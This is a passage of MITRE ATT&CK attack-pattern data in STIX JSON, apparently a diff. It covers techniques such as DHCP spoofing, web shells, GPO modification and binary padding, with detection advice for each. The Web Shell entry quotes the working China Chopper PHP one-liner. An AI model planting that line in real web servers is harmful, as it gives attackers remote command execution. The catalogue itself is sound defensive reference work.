"2022-11-08T14:00:00.188Z", + "name": "DHCP Spoofing", + "description": "Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).\n\nDHCP is based on a client-server model and has two functionalities: a protocol for providing network configuration settings from a DHCP server to a client and a mechanism for allocating network addresses to clients.(Citation: rfc2131) The typical server-client interaction is as follows: \n\n1. The client broadcasts a `DISCOVER` message.\n\n2. The server responds with an `OFFER` message, which includes an available network address. \n\n3. The client broadcasts a `REQUEST` message, which includes the network address offered. \n\n4. The server acknowledges with an `ACK` message and the client receives the network configuration parameters.\n\nAdversaries may spoof as a rogue DHCP server on the victim network, from which legitimate hosts may receive malicious network configurations. For example, malware can act as a DHCP server and provide adversary-owned DNS servers to the victimized computers.(Citation: new_rogue_DHCP_serv_malware)(Citation: w32.tidserv.g) Through the malicious network configurations, an adversary may achieve the AiTM position, route client traffic through adversary-controlled systems, and collect information from the client network.\n\nDHCPv6 clients can receive network configuration information without being assigned an IP address by sending a INFORMATION-REQUEST (code 11) message to the All_DHCP_Relay_Agents_and_Servers multicast address.(Citation: rfc3315) Adversaries may use their rogue DHCP server to respond to this request message with malicious network configurations.\n\nRather than establishing an AiTM position, adversaries may also abuse DHCP spoofing to perform a DHCP exhaustion attack (i.e, [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)) by generating many broadcast DISCOVER messages to exhaust a network’s DHCP allocation pool. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Alex Spivakovsky, Pentera", + "Andrew Allen, @whitehat_zero" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor network traffic for suspicious/malicious behavior involving DHCP, such as changes in DNS and/or gateway parameters. Additionally, monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which specify that the IP allocations are low or have run out; these EIDs may indicate a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--59ff91cd-1430-4075-8563-e6f15f4f9ff5", + "created": "2022-03-24T19:30:56.727Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1557/003", + "external_id": "T1557.003" + }, + { + "source_name": "rfc2131", + "description": "Droms, R. (1997, March). Dynamic Host Configuration Protocol. Retrieved March 9, 2022.", + "url": "https://datatracker.ietf.org/doc/html/rfc2131" + }, + { + "source_name": "new_rogue_DHCP_serv_malware", + "description": "Irwin, Ullrich, J. (2009, March 16). new rogue-DHCP server malware. Retrieved January 14, 2022.", + "url": "https://isc.sans.edu/forums/diary/new+rogueDHCP+server+malware/6025/" + }, + { + "source_name": "rfc3315", + "description": "J. Bound, et al. (2003, July). Dynamic Host Configuration Protocol for IPv6 (DHCPv6). Retrieved June 27, 2022.", + "url": "https://datatracker.ietf.org/doc/html/rfc3315" + }, + { + "source_name": "dhcp_serv_op_events", + "description": "Microsoft. (2006, August 31). DHCP Server Operational Events. Retrieved March 7, 2022.", + "url": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800668(v=ws.11)" + }, + { + "source_name": "solution_monitor_dhcp_scopes", + "description": "Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved March 7, 2022.", + "url": "https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/" + }, + { + "source_name": "w32.tidserv.g", + "description": "Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January 14, 2022.", + "url": "https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:05.776Z", + "name": "Execution through API", + "description": "Adversaries may attempt to leverage Application Program Interfaces (APIs) used for communication between control software and the hardware. Specific functionality is often coded into APIs which can be called by software to engage specific functions on a device or other software.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Process: OS API Execution" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0871", + "external_id": "T0871" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "AppleScript", + "description": "macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the osalang program.\nAppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. \n\nAdversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python (Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via osascript /path/to/script or osascript -e \"script here\".", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor for execution of AppleScript through osascript that may be related to other suspicious behavior occurring on the system.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--5ad95aaa-49c1-4784-821d-2e83f47b079b", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1155", + "external_id": "T1155" + }, + { + "source_name": "Macro Malware Targets Macs", + "description": "Yerko Grbic. (2017, February 14). Macro Malware Targets Macs. Retrieved July 8, 2017.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-02-26T14:21:37.818Z", + "name": "Remote Service Session Hijacking", + "description": "Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.\n\nAdversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://attack.mitre.org/techniques/T1563) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: RDP Hijacking Medium)(Citation: Breach Post-mortem SSH Hijack)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.\n\nMonitor for processes and command-line arguments associated with hijacking service sessions.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5", + "created": "2020-02-25T18:26:16.994Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1563", + "external_id": "T1563" + }, + { + "source_name": "RDP Hijacking Medium", + "description": "Beaumont, K. (2017, March 19). RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organisation. Retrieved December 11, 2017.", + "url": "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6" + }, + { + "source_name": "Breach Post-mortem SSH Hijack", + "description": "Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr 11 security incident. Retrieved February 17, 2020.", + "url": "https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T21:01:53.857Z", + "name": "Binary Padding", + "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. \n\nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Martin Jirkal, ESET" + ], + "x_mitre_detection": "Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool. When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Signature-based detection" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", + "created": "2020-02-05T14:04:25.865Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1027/001", + "external_id": "T1027.001" + }, + { + "source_name": "ESET OceanLotus", + "description": "Foltýn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.", + "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/" + }, + { + "source_name": "Securelist Malware Tricks April 2017", + "description": "Ishimaru, S.. (2017, April 13). Old Malware Tricks To Bypass Detection in the Age of Big Data. Retrieved May 30, 2019.", + "url": "https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/" + }, + { + "source_name": "VirusTotal FAQ", + "description": "VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019.", + "url": "https://www.virustotal.com/en/faq/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T12:45:06.434Z", + "name": "Web Shell", + "description": "Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to access the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW)\n\nIn addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Arnim Rupp, Deutsche Lufthansa AG" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) \n\n<?php @eval($_POST['password']);>\n\nNevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as spawning cmd.exe or accessing files that are not in the Web directory.(Citation: NSA Cyber Mitigating Web Shells)\n\nFile monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script.(Citation: NSA Cyber Mitigating Web Shells)\n\nLog authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "Network" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", + "created": "2019-12-13T16:46:18.927Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1505/003", + "external_id": "T1505.003" + }, + { + "source_name": "NSA Cyber Mitigating Web Shells", + "description": " NSA Cybersecurity Directorate. (n.d.). Mitigating Web Shells. Retrieved July 22, 2021.", + "url": "https://github.com/nsacyber/Mitigating-Web-Shells" + }, + { + "source_name": "volexity_0day_sophos_FW", + "description": "Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022.", + "url": "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/" + }, + { + "source_name": "Lee 2013", + "description": "Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.", + "url": "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html" + }, + { + "source_name": "US-CERT Alert TA15-314A Web Shells", + "description": "US-CERT. (2015, November 13). Compromised Web Servers and Web Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.", + "url": "https://www.us-cert.gov/ncas/alerts/TA15-314A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Group Policy Modification", + "description": "Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\\\\SYSVOL\\\\Policies\\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \n\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\n\nMalicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)\n\nFor example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Itamar Mizrahi, Cymptom", + "Tristan Bennett, Seamless Intelligence" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:\n\n* Event ID 5136 - A directory service object was modified\n* Event ID 5137 - A directory service object was created\n* Event ID 5138 - A directory service object was undeleted\n* Event ID 5139 - A directory service object was moved\n* Event ID 5141 - A directory service object was deleted\n\n\nGPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--5d2be8b9-d24c-4e98-83bf-2f5f79477163", + "created": "2020-12-28T21:50:59.844Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1484/001", + "external_id": "T1484.001" + }, + { + "source_name": "Mandiant M Trends 2016", + "description": "Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf" + }, + { + "source_name": "ADSecurity GPO Persistence 2016", + "description": "Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence #17: Group Policy. Retrieved March 5, 2019.", + "url": "https://adsecurity.org/?p=2716" + }, + { + "source_name": "Microsoft Hacking Team Breach", + "description": "Microsoft Secure Team. (2016, June 1). Hacking Team Breach: A Cyber Jurassic Park. Retrieved March 5, 2019.", + "url": "https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/" + }, + { + "source_name": "Wald0 Guide to GPOs", + "description": "Robbins, A. (2018, April 2). A Red Teamer’s Guide to GPOs and OUs. Retrieved March 5, 2019.", + "url": "https://wald0.com/?p=179" + }, + { + "source_name": "Harmj0y Abusing GPO Permissions", + "description": "Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved March 5, 2019.", + "url": "http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/" + }, + { + "source_name": "Harmj0y SeEnableDelegationPrivilege Right", + "description": "Schroeder, W. (2017, January 10). The Most Dangerous User Right You (Probably) Have Never Heard Of. Retrieved March 5, 2019.", + "url": "http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/" + }, + { + "source_name": "TechNet Group Policy Basics", + "description": "srachui. (2012, February 13). Group Policy Basics – Part 1: Understanding the Structure of a Group Policy Object. Retrieved March 5, 2019.", + "url": "https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:05.975Z", + "name": "Supply Chain Compromise", + "description": "Adversaries may perform supply chain compromise to gain control systems environment access by means of infected products, software, and workflows. Supply chain compromise is the manipulation of products, such as devices or software, or their delivery mechanisms before receipt by the end consumer. Adversary compromise of these products and mechanisms is done for the goal of data or system compromise, once infected products are introduced to the target environment. \n\nSupply chain compromise can occur at all stages of the supply chain, from manipulation of development tools and environments to manipulation of developed products and tools distribution mechanisms. This may involve the compromise and replacement of legitimate software and patches, such as on third party or vendor websites. Targeting of supply chain compromise can be done in attempts to infiltrate the environments of a specific audience. In control systems environments with assets in both the IT and OT networks, it is possible a supply chain compromise affecting the IT environment could enable further access to the OT environment. \n\nCounterfeit devices may be introduced to the global supply chain posing safety and cyber risks to asset owners and operators. These devices may not meet the safety, engineering and manufacturing requirements of regulatory bodies but may feature tagging indicating conformance with industry standards. Due to the lack of adherence to standards and overall lesser quality, the counterfeit products may pose a serious safety and operational risk. (Citation: Control Global May 2019) \n\nYokogawa identified instances in which their customers received counterfeit differential pressure transmitters using the Yokogawa logo. The counterfeit transmitters were nearly indistinguishable with a semblance of functionality and interface that mimics the genuine product. (Citation: Control Global May 2019) \n\nF-Secure Labs analyzed the approach the adversary used to compromise victim systems with Havex. (Citation: Daavid Hentunen, Antti Tikkanen June 2014) The adversary planted trojanized software installers available on legitimate ICS/SCADA vendor websites. After being downloaded, this software infected the host computer with a Remote Access Trojan (RAT).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "File: File Metadata" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0862", + "external_id": "T0862" + }, + { + "source_name": "Control Global May 2019", + "description": "Control Global 2019, May 29 Yokogawa announcement warns of counterfeit transmitters Retrieved. 2021/04/09 ", + "url": "https://www.controlglobal.com/industrynews/2019/yokogawa-announcement-warns-of-counterfeit-transmitters/" + }, + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Browser Information Discovery", + "description": "Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)\n\nBrowser information may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.\n\nSpecific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., `%APPDATA%/Google/Chrome`).(Citation: Chrome Roaming Profiles)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Mike Kemmerer", + "Manikantan Srinivasan, NEC Corporation India", + "Yinon Engelsman, Talon Cyber Security", + "Yonatan Gotlib, Talon Cyber Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1217", + "external_id": "T1217" + }, + { + "source_name": "Chrome Roaming Profiles", + "description": "Chrome Enterprise and Education Help. (n.d.). Use Chrome Browser with Roaming User Profiles. Retrieved March 28, 2023.", + "url": "https://support.google.com/chrome/a/answer/7349337" + }, + { + "source_name": "Kaspersky Autofill", + "description": "Golubev, S. (n.d.). How malware steals autofill data from browsers. Retrieved March 28, 2023.", + "url": "https://www.kaspersky.com/blog/browser-data-theft/27871/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Serial Connection Enumeration", + "description": "Adversaries may perform serial connection enumeration to gather situational awareness after gaining access to devices in the OT network. Control systems devices often communicate to each other via various types of serial communication mediums. These serial communications are used to facilitate informational communication, as well as commands. Serial Connection Enumeration differs from I/O Module Discovery, as I/O modules are auxiliary systems to the main system, and devices that are connected via serial connection are normally discrete systems.\n\nWhile IT and OT networks may work in tandem, the exact structure of the OT network may not be discernible from the IT network alone. After gaining access to a device on the OT network, an adversary may be able to enumerate the serial connections. From this perspective, the adversary can see the specific physical devices to which the compromised device is connected to. This gives the adversary greater situational awareness and can influence the actions that the adversary can take in an attack.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Input/Output Server", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--5f3da2f3-91c8-4d8b-a02f-bf43a11def55", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": 